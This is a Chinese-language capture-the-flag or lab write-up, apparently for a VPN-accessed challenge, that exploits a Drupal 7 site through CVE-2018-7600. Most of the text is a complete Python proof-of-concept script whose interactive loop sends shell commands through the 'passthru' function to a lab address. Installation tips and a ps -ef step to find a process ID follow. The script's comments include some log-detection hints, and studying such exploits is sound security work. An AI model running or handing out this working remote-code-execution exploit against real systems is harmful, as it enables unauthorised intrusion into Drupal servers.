按要求下载VPN连接后
发现是drupal
用linux搜索相关漏洞
使用最常见的 CVE-2018-7600 漏洞(Drupal 核心远程代码执行,下文脚本横幅注明影响 Drupal 7 的 7.57 及更早版本)
在网上搜索该漏洞的poc
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
def pwn_target(target, function, command, proxy):
    """Send the two-request CVE-2018-7600 sequence to ``target`` and print the reply.

    Args:
        target: Base URL of the Drupal site; both requests are POSTed to it.
        function: Value placed in the ``name[#post_render][]`` query parameter.
        command: Value placed in the ``name[#markup]`` query parameter.
        proxy: Proxy URL applied to both the ``http`` and ``https`` schemes.

    Returns:
        None. The part of the second response body that precedes the
        ``[{"command":"settings"`` marker is printed to stdout.

    Raises:
        Any exception raised while parsing the first response or sending the
        second request is re-raised after a generic error line is printed
        (for example ``AttributeError`` when no ``user-pass`` form is found).
    """
    # TLS certificate verification is disabled on both requests (verify=False)
    # and the matching urllib3 warning is silenced here, so the identity of
    # the server is never checked.
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}

    # Request 1: POST to ?q=user/password with render-array keys nested under
    # the 'name' parameter. For defenders, '#'-prefixed keys such as
    # '#post_render' in request parameters on this path are the thing to look
    # for in web-server / WAF logs; the banner in main() lists Drupal 7 up to
    # 7.57 as affected.
    poison_query = {'q': 'user/password', 'name[#post_render][]': function, 'name[#type]': 'markup', 'name[#markup]': command}
    poison_body = {'form_id': 'user_pass', '_triggering_element_name': 'name', '_triggering_element_value': '', 'opz': 'E-mail new Password'}
    first_reply = requests.post(target, params=poison_query, data=poison_body, verify=False, proxies=proxies)
    soup = BeautifulSoup(first_reply.text, "html.parser")

    try:
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
        if not form_build_id:
            # No cached form id came back; nothing further is sent.
            return

        # Request 2: POST to ?q=file/ajax/name/#value/<form_build_id> using
        # the id scraped from the first response. A password-reset POST
        # followed directly by a file/ajax POST from the same client is the
        # second half of the log pattern.
        trigger_query = {'q': 'file/ajax/name/#value/' + form_build_id}
        trigger_body = {'form_build_id': form_build_id}
        second_reply = requests.post(target, params=trigger_query, data=trigger_body, verify=False, proxies=proxies)

        # Keep only what precedes the AJAX settings payload in the response.
        parsed_result = second_reply.text.split('[{"command":"settings"')[0]
        print(parsed_result)
    except:
        # Report, then propagate unchanged so the caller sees the real error.
        print("ERROR: Something went wrong.")
        raise
def main():
    """Print the banner, then forward each stdin line to ``pwn_target``.

    The target URL, the function name and the SOCKS proxy are hard-coded.
    The loop ends when ``KeyboardInterrupt`` is raised while ``pwn_target``
    is running; the ``input()`` call is outside the ``try`` block, so an
    interrupt at the prompt is not caught here. Any other exception from
    ``pwn_target`` propagates out of ``main``.
    """
    banner_rows = (
        '=============================================================================',
        '| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |',
        '| by xiugou |',
        '=============================================================================\n',
    )
    print()
    for row in banner_rows:
        print(row)

    function = "passthru"
    # Requests are routed through a local SOCKS5 listener.
    proxy = "socks5://127.0.0.1:1080"
    # Fixed lab address; it never changes between iterations.
    target = "http://172.18.0.2"

    running = True
    while running:
        command = input("shell>> :")
        try:
            pwn_target(target.strip(), function.strip(), command.strip(), proxy.strip())
        except KeyboardInterrupt:
            print("Exit program.")
            running = False
# Run the interactive loop only when executed as a script, not on import.
if __name__ == '__main__':
    main()
把地址改成需要利用的地址
在终端尝试运行
如果运行时报错找不到 bs4 模块,可以在所用 Python 环境的命令行中输入
pip install beautifulsoup4
或者进入pycharm中(如果是用pycharm的话)
在里面搜索beautifulsoup4下载即可
题目是要进程号
输入ps -ef查看进程
如果提示缺包(脚本通过 socks5:// 代理发送请求,requests 需要 pysocks 才能支持 SOCKS 代理),执行
python3.9 -m pip install pysocks
再访问即可
若无报错但长时间无法访问,重启VPN即可